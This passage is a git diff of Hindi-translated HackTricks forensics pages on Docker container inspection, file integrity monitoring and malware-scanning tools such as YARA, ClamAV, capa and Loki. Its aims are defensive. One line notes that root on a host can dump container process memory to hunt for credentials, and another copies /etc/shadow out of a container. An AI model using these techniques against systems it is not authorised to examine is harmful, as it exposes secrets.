प्रक्रियाओं को पकड़ना -* क्या यह अप +* क्या diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md b/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md index a33d827c9..862dd1bb3 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md @@ -1,22 +1,23 @@ # डॉकर फोरेंसिक्स +{% hint style="success" %} +AWS हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
+{% endhint %} -## कंटेनर संशोधन +## कंटेनर मोडिफिकेशन -कुछ संदेह है कि किसी डॉकर कंटेनर को कंप्रोमाइज किया गया था: +कुछ संदेह है कि किसी डॉकर कंटेनर में हमला हुआ था: ```bash docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES @@ -36,12 +37,12 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI A /var/lib/mysql/mysql/general_log.CSV ... ``` -पिछले कमांड में **C** का मतलब **बदल गया** है और **A,** **जोड़ा गया** है।\ -अगर आपको लगता है कि कुछ दिलचस्प फ़ाइल जैसे कि `/etc/shadow` में संशोधन किया गया है, तो आप इसे कंटेनर से डाउनलोड करके जांच के लिए कर सकते हैं: +पिछले कमांड में **C** का मतलब **बदल गया** है और **A,** **जोड़ा गया**।\ +अगर आपको लगता है कि कोई दिलचस्प फ़ाइल जैसे `/etc/shadow` में संशोधन किया गया है तो आप इसे कंटेनर से डाउनलोड करके जांच सकते हैं कि क्या कोई हानिकारक गतिविधि है। ```bash docker cp wordpress:/etc/shadow. ``` -आप एक नए कंटेनर चलाकर इसकी मूल फ़ाइल को निकालकर इसे मूल फ़ाइल के साथ **तुलना कर सकते हैं**: +आप एक नए कंटेनर को चला कर इसकी तुलना **मूल फ़ाइल से कर सकते हैं** और उससे फ़ाइल निकाल सकते हैं: ```bash docker run -d lamp-wordpress docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container @@ -51,16 +52,16 @@ diff original_shadow shadow ```bash docker exec -it wordpress bash ``` -## छवि संशोधन +## छवियों की संशोधन -जब आपको एक निर्यातित डॉकर छवि दी जाती है (संभावित रूप में `.tar` प्रारूप में) तो आप [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) का उपयोग कर सकते हैं **संशोधनों का सारांश निकालने** के लिए: +जब आपको एक निर्यातित डॉकर छवि दी जाती है (संभावित रूप में `.tar` प्रारूप में), तो आप [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) का उपयोग कर सकते हैं **संशोधनों की सारांश** निकालने के लिए: ```bash docker save > image.tar #Export the image to a .tar file container-diff analyze -t sizelayer image.tar container-diff analyze -t history image.tar container-diff analyze -t metadata image.tar ``` -फिर, आप **छवि को डीकंप्रेस** कर सकते हैं और **ब्लॉब्स तक पहुंच सकते हैं** जिससे आप संशयित फ़ाइलों की खोज कर सकते हैं जो आपने परिवर्तन इतिहास में पाई हो सकती हैं: +फिर, आप **छवि को डीकंप्रेस** कर सकते हैं और **ब्लॉब्स तक पहुंच सकते हैं** जिससे आप संशयात्मक फ़ाइलों की खोज कर सकते हैं जो आपने परिवर्तन इतिहास में पाई हो सकती हैं: ```bash tar -xf image.tar ``` @@ -70,18 +71,18 @@ tar -xf image.tar ```bash docker inspect ``` -आप यहाँ एक सारांश **परिवर्तन के इतिहास** प्राप्त कर सकते हैं: +आप निम्नलिखित के साथ एक सारांश **परिवर्तन का इतिहास** प्राप्त कर सकते हैं: ```bash docker history --no-trunc ``` -आप एक छवि से एक **डॉकरफ़ाइल भी उत्पन्न कर सकते हैं** इसके साथ: +आप एक छवि से एक **डॉकरफ़ाइल भी बना सकते हैं** इसके साथ: ```bash alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> ``` ### डाइव -डॉकर इमेजेस में जोड़ी गई/संशोधित फ़ाइलें खोजने के लिए आप [**डाइव**](https://github.com/wagoodman/dive) (इसे [**रिलीज़**](https://github.com/wagoodman/dive/releases/tag/v0.10.0) से डाउनलोड करें) उपयोग कर सकते हैं: +डॉकर इमेजेस में जोड़ी गई/संशोधित फ़ाइलें खोजने के लिए आप [**डाइव**](https://github.com/wagoodman/dive) (इसे [**रिलीज़**](https://github.com/wagoodman/dive/releases/tag/v0.10.0) से डाउनलोड करें) उपयोगी है: ```bash #First you need to load the image in your docker repo sudo docker load < image.tar 1 ⨯ @@ -90,10 +91,10 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` -यह आपको **डॉकर इमेज के विभिन्न ब्लॉब के माध्यम से नेविगेट करने** और जांचने की अनुमति देता है कि कौन से फ़ाइलें संशोधित/जोड़ी गई थीं। **लाल** रंग जोड़ी गई को और **पीला** रंग संशोधित को दर्शाता है। **टैब** का उपयोग दूसरे दृश्य में जाने के लिए और **स्पेस** को फोल्डर को संक्षिप्त/खोलने के लिए करें। +यह आपको **डॉकर इमेज के विभिन्न ब्लॉब के माध्यम से नेविगेट करने** और जांचने की अनुमति देता है कि कौन से फ़ाइलें संशोधित/जोड़ी गई थीं। **लाल** जोड़ी गई है और **पीला** संशोधित कर दिया गया है। **टैब** का उपयोग दूसरे दृश्य में जाने के लिए और **स्पेस** का उपयोग फ़ोल्डर को संक्षिप्त/खोलने के लिए करें। इसके साथ आप इमेज के विभिन्न स्टेज के सामग्री तक पहुंच नहीं पाएंगे। इसे करने के लिए आपको **प्रत्येक लेयर को डीकंप्रेस करना और उस तक पहुंचना** होगा।\ -आप इमेज से सभी लेयर्स को डीकंप्रेस कर सकते हैं जिसे इमेज को डीकंप्रेस किया गया था उस निर्देशिका से जहां से इमेज को डीकंप्रेस किया गया था कार्यान्वित करके: +आप इमेज से सभी लेयर को डीकंप्रेस कर सकते हैं जो इमेज को डीकंप्रेस किया गया था उस निर्देशिका से जहां इमेज को डीकंप्रेस किया गया था क्रियान्वित करके: ```bash tar -xf image.tar for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done @@ -102,4 +103,4 @@ for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; don ध्यान दें कि जब आप एक होस्ट के अंदर एक डॉकर कंटेनर चलाते हैं **तो आप होस्ट से कंटेनर पर चल रहे प्रोसेस देख सकते हैं** बस `ps -ef` चलाकर -इसलिए (रूट के रूप में) आप **होस्ट से प्रोसेस की मेमोरी डंप** कर सकते हैं और **क्रेडेंशियल्स** की खोज कर सकते हैं बस [**निम्नलिखित उदाहरण की तरह**](../../linux-hardening/privilege-escalation/#process-memory)। +इसलिए (रूट के रूप में) आप **होस्ट से प्रोसेसेस की मेमोरी डंप** कर सकते हैं और **क्रेडेंशियल्स** के लिए खोज कर सकते हैं बस [**निम्नलिखित उदाहरण की तरह**](../../linux-hardening/privilege-escalation/#process-memory)। diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md b/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md index 82569c684..616fd151c 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,40 +1,54 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} -# मूल्यांकन +# मूलाधार -एक मूल्यांकन में एक सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेना शामिल है ताकि **बदलावों को हाइलाइट करने के लिए एक भविष्य की स्थिति के साथ तुलना की जा सके**। +एक मूलाधार किसी सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेने से बनता है **इसे भविष्य की स्थिति के साथ तुलना करने के लिए परिवर्तनों को हाइलाइट करने के लिए**। -उदाहरण के लिए, आप फ़ाइल सिस्टम की प्रत्येक फ़ाइल का हैश कैलकुलेट और स्टोर कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फ़ाइलें संशोधित की गई थीं।\ -इसे उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ भी किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए। +उदाहरण के लिए, आप फाइल सिस्टम की प्रत्येक फ़ाइल का हैश गणना और स्टोर करना कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फ़ाइलें संशोधित की गई थीं।\ +यह भी उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए। ## फ़ाइल अखंडता मॉनिटरिंग -फ़ाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैक करके IT वातावरण और डेटा की सुरक्षा करती है। इसमें दो मुख्य कदम शामिल हैं: +फ़ाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैकिंग करके IT वातावरण और डेटा को सुरक्षित रखती है। इसमें दो मुख्य कदम शामिल हैं: -1. **मूल्यांकन तुलना:** भविष्य की तुलना के लिए फ़ाइल गुणांक या एन्क्रिप्टेड चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके एक मूल्यांकन स्थापित करें ताकि संशोधनों का पता लगा सकें। -2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोधित किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से। +1. **मूलाधार तुलना:** भविष्य के तुलना के लिए फ़ाइल गुणांक या क्रिप्टोग्राफिक चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके एक मूलाधार स्थापित करें ताकि संशोधनों का पता लगाने के लिए। +2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोधन किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से। ## उपकरण * [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) * [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) -# संदर्भ +## संदर्भ * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
+ +हैकट्रिक्स का समर्थन करें + +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में। + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md index cef3300bc..dafcc139b 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md @@ -1,18 +1,19 @@ # मैलवेयर विश्लेषण +{% hint style="success" %} +AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} ## फोरेंसिक्स चीटशीट्स @@ -28,7 +29,7 @@ HackTricks का समर्थन करने के अन्य तरी ## ऑफलाइन एंटीवायरस और पहचान उपकरण -### Yara +### यारा #### स्थापित ```bash @@ -37,7 +38,7 @@ sudo apt-get install -y yara #### नियम तैयार करें इस स्क्रिप्ट का उपयोग करके गिथब से सभी यारा मैलवेयर नियम डाउनलोड और मर्ज करें: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -_**rules**_ निर्देशिका बनाएं और इसे निष्पादित करें। इससे _**malware\_rules.yar**_ नाम की फ़ाइल बनेगी जिसमें सभी मैलवेयर के लिए यारा नियम होंगे। +_**rules**_ निर्देशिका बनाएं और इसे निष्पादित करें। इससे _**malware\_rules.yar**_ नामक एक फ़ाइल बनेगी जिसमें सभी मैलवेयर के लिए यारा नियम होंगे। ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules @@ -48,9 +49,9 @@ python malware_yara_rules.py yara -w malware_rules.yar image #Scan 1 file yara -w malware_rules.yar folder #Scan the whole folder ``` -#### YaraGen: मैलवेयर की जांच करें और नियम बनाएं +#### YaraGen: मैलवेयर की जाँच करें और नियम बनाएं -आप टूल [**YaraGen**](https://github.com/Neo23x0/yarGen) का उपयोग करके एक बाइनरी से यारा नियम उत्पन्न कर सकते हैं। इन ट्यूटोरियल्स की जाँच करें: [**भाग 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**भाग 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**भाग 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) +आप टूल [**YaraGen**](https://github.com/Neo23x0/yarGen) का उपयोग कर सकते हैं ताकि आप एक बाइनरी से यारा नियम उत्पन्न कर सकें। इन ट्यूटोरियल्स की जाँच करें: [**भाग 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**भाग 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**भाग 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) ```bash python3 yarGen.py --update python3.exe yarGen.py --excludegood -m ../../mals/ @@ -67,11 +68,11 @@ sudo freshclam #Update rules clamscan filepath #Scan 1 file clamscan folderpath #Scan the whole folder ``` -### [कैपा](https://github.com/mandiant/capa) +### [Capa](https://github.com/mandiant/capa) -**कैपा** executables में पोटेंशियली हानिकारक **क्षमताएँ** का पता लगाता है: PE, ELF, .NET। इसलिए यह चीजों को खोजेगा जैसे Att\&ck तकनीकें, या संदिग्ध क्षमताएँ जैसे: +**Capa** प्रोग्रामों में संभावित दुष्ट **क्षमताएँ** का पता लगाता है: PE, ELF, .NET। इसलिए यह चीजों को खोजेगा जैसे Att\&ck युक्तियाँ, या संदिग्ध क्षमताएँ जैसे: -* OutputDebugString त्रुटि की जांच करें +* OutputDebugString त्रुटि की जाँच करें * सेवा के रूप में चलाएं * प्रक्रिया बनाएं @@ -79,15 +80,15 @@ clamscan folderpath #Scan the whole folder ### IOCs -IOC का मतलब होता है Indicator Of Compromise। एक IOC एक सेट की **शर्तें हैं जो** कुछ पोटेंशियली अवांछित सॉफ्टवेयर या पुष्ट **मैलवेयर** की पहचान करती हैं। ब्लू टीम इस प्रकार की परिभाषा का उपयोग अपने **सिस्टम** और **नेटवर्क** में इस प्रकार के हानिकारक फ़ाइलों की **खोज के लिए** करती है।\ -इन परिभाषाओं को साझा करना बहुत उपयोगी है क्योंकि जब किसी कंप्यूटर में मैलवेयर की पहचान होती है और उस मैलवेयर के लिए एक IOC बनाया जाता है, तो अन्य ब्लू टीम इसका उपयोग करके मैलवेयर की पहचान तेजी से कर सकती है। +IOC का मतलब होता है Indicator Of Compromise। एक IOC एक सेट की **शर्तें हैं जो** कुछ संभावित अवांछित सॉफ्टवेयर या पुष्ट **मैलवेयर** की पहचान करती हैं। ब्लू टीम इस प्रकार की परिभाषा का उपयोग अपने **सिस्टम** और **नेटवर्क्स** में **इस प्रकार के दुष्ट फ़ाइलें खोजने** के लिए करती है।\ +इन परिभाषाओं को साझा करना बहुत उपयोगी है क्योंकि जब किसी कंप्यूटर में मैलवेयर की पहचान होती है और उस मैलवेयर के लिए एक IOC बनाया जाता है, तो अन्य ब्लू टीम इसका उपयोग करके मैलवेयर की पहचान तेज़ कर सकती है। IOC बनाने या संशोधित करने के लिए एक उपकरण है [**IOC संपादक**](https://www.fireeye.com/services/freeware/ioc-editor.html)**।**\ -आप उपकरणों का उपयोग कर सकते हैं जैसे [**Redline**](https://www.fireeye.com/services/freeware/redline.html) **डिवाइस में परिभाषित IOC की खोज करने के लिए**। +आप [**Redline**](https://www.fireeye.com/services/freeware/redline.html) जैसे उपकरण का उपयोग कर सकते हैं **एक उपकरण में परिभाषित IOC खोजने के लिए**। -### लोकी +### Loki -[**लोकी**](https://github.com/Neo23x0/Loki) एक स्कैनर है आसान इंडिकेटर्स ऑफ कंप्रोमाइज के लिए।\ +[**Loki**](https://github.com/Neo23x0/Loki) एक स्कैनर है आसान दुष्टता के संकेतों के लिए।\ पहचान चार पहचान पद्धतियों पर आधारित है: ``` 1. File Name IOC @@ -104,11 +105,11 @@ Compares process connection endpoints with C2 IOCs (new since version v.10) ``` ### लिनक्स मैलवेयर डिटेक्ट -[**लिनक्स मैलवेयर डिटेक्ट (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) एक मैलवेयर स्कैनर है जो गनू जीवीपीएल लाइसेंस के तहत जारी किया गया है, जो साझा होस्टेड वातावरणों में प्रतिकूलताओं के आसपास डिज़ाइन किया गया है। यह नेटवर्क किनारे घुसपैठ डिटेक्शन सिस्टम से धमाकों में उपयोग किया जा रहा मैलवेयर निकालने के लिए धमाकों से निकाला गया मैलवेयर का डेटा उपयोग करता है और पहचान के लिए सिग्नेचर उत्पन्न करता है। साथ ही, धमाकों से डेटा भी LMD चेकआउट सुविधा और मैलवेयर समुदाय संसाधनों से प्राप्त किया जाता है। +[**लिनक्स मैलवेयर डिटेक्ट (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) एक मैलवेयर स्कैनर है जो गीनू GPLv2 लाइसेंस के तहत जारी किया गया है, जो साझा होस्टेड वातावरणों में प्रतिकूल सामना करने के लिए डिज़ाइन किया गया है। यह नेटवर्क एज इन्ट्रूजन डिटेक्शन सिस्टम से धमाकों में उपयोग किया जा रहा मैलवेयर को निकालने के लिए धमाकों के खतरों के आसपास डिज़ाइन किया गया है और पहचान के लिए सिग्नेचर उत्पन्न करता है। साथ ही, धमाकों के डेटा को भी LMD चेकआउट सुविधा और मैलवेयर समुदाय संसाधनों से प्राप्त किया जाता है। -### आरकेहंटर +### rkhunter -[**रेखंटर**](http://rkhunter.sourceforge.net) जैसे उपकरण फाइल सिस्टम की जाँच के लिए उपयोग किया जा सकता है जहाँ संभावित **रूटकिट्स** और मैलवेयर की जाँच की जा सकती है। +[**rkhunter**](http://rkhunter.sourceforge.net) जैसे उपकरण को फाइल सिस्टम की जाँच के लिए उपयोग किया जा सकता है जिसमें संभावित **रूटकिट्स** और मैलवेयर की जाँच की जा सकती है। ```bash sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress] ``` @@ -118,27 +119,27 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ### PEpper -[PEpper ](https://github.com/Th3Hurrican3/PEpper) executable में कुछ मौलिक विषयों की जांच करता है (बाइनरी डेटा, एंट्रोपी, URLs और IPs, कुछ yara नियम।) +[PEpper ](https://github.com/Th3Hurrican3/PEpper) executable में कुछ मौलिक विषयों की जांच करता है (binary data, entropy, URLs और IPs, कुछ yara rules). ### PEstudio -[PEstudio](https://www.winitor.com/download) एक टूल है जो Windows executables की जानकारी प्राप्त करने की अनुमति देता है जैसे imports, exports, headers, लेकिन यह वायरस टोटल की जांच करेगा और पोटेंशियल Att\&ck तकनीकों को भी खोजेगा। +[PEstudio](https://www.winitor.com/download) एक टूल है जो Windows executables की जानकारी प्राप्त करने की अनुमति देता है जैसे imports, exports, headers, लेकिन यह वायरस टोटल की जांच करेगा और potential Att\&ck techniques खोजेगा। ### Detect It Easy(DiE) -[**DiE**](https://github.com/horsicq/Detect-It-Easy/) एक टूल है जो फ़ाइल को **एन्क्रिप्टेड** है या नहीं यह खोजने के लिए है और **पैकर्स** को भी खोजेगा। +[**DiE**](https://github.com/horsicq/Detect-It-Easy/) एक टूल है जो फ़ाइल के एन्क्रिप्टेड होने की जांच करने के लिए है और **packers** भी खोजेगा। ### NeoPI -[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) एक Python स्क्रिप्ट है जो **सांख्यिकीय विधियों** का उपयोग करके **छिपे हुए** और **एन्क्रिप्टेड** सामग्री की खोज करने के लिए है। NeoPI का उद्देश्य **छिपी वेब शैल कोड** की **खोज** में सहायता करना है। +[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) एक Python script है जो **statistical methods** का उपयोग करके text/script files में **obfuscated** और **encrypted** content की पहचान करने के लिए है। NeoPI का उद्देश्य **hidden web shell code** की पहचान में सहायता करना है। ### **php-malware-finder** -[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) अपनी सर्वोत्तम प्रयास करता है कि **छिपे हुए**/**अविश्वसनीय कोड** को खोजें जैसे कि फ़ाइलें जो **मैलवेयर**/वेबशैल में अक्सर उपयोग की जाने वाली **PHP** फ़ंक्शन्स का उपयोग कर रही हों। +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) अपनी सर्वोत्तम कोशिश करता है कि **obfuscated**/**dodgy code** और फ़ाइलों की पहचान करें जो अक्सर **malwares**/webshells में उपयोग की जाने वाली **PHP** functions का उपयोग करती हैं। ### Apple Binary Signatures -किसी **मैलवेयर नमूने** की जांच करते समय आपको हमेशा बाइनरी के **सिग्नेचर** की जांच करनी चाहिए क्योंकि उस **डेवलपर** को जिसने इसे साइन किया हो, पहले से ही **मैलवेयर** से **संबंधित** हो सकता है। +किसी **malware sample** की जांच करते समय आपको हमेशा बाइनरी के **signature** की जांच करनी चाहिए क्योंकि उस **developer** को जिसने इसे साइन किया हो संबंधित हो सकता है **malware** के साथ। ```bash #Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" @@ -149,16 +150,16 @@ codesign --verify --verbose /Applications/Safari.app #Check if the signature is valid spctl --assess --verbose /Applications/Safari.app ``` -## पहचान तकनीकें +## डिटेक्शन तकनीक ### फ़ाइल स्टैकिंग -अगर आपको पता है कि किसी वेब सर्वर के **फ़ाइलें** की एक फ़ोल्डर **कोई निश्चित तारीख** को **अपडेट किया गया था**। **जांचें** कि **वेब सर्वर की सभी फ़ाइलें कब बनाई और संशोधित** की गई थीं और यदि कोई तारीख **संदिग्ध** है, तो उस फ़ाइल की जांच करें। +अगर आपको पता है कि किसी वेब सर्वर के **फ़ाइलें** की एक फ़ोल्डर **कोई तारीख** पर **अंतिम बार अपडेट की गई थी**। **जांचें** कि **वेब सर्वर की सभी फ़ाइलें कब बनाई और संशोधित** की गई थीं और यदि कोई तारीख **संदिग्ध** है, तो उस फ़ाइल की जांच करें। ### बेसलाइन्स -अगर किसी फ़ोल्डर की फ़ाइलें **संशोधित नहीं होनी चाहिए**, तो आप 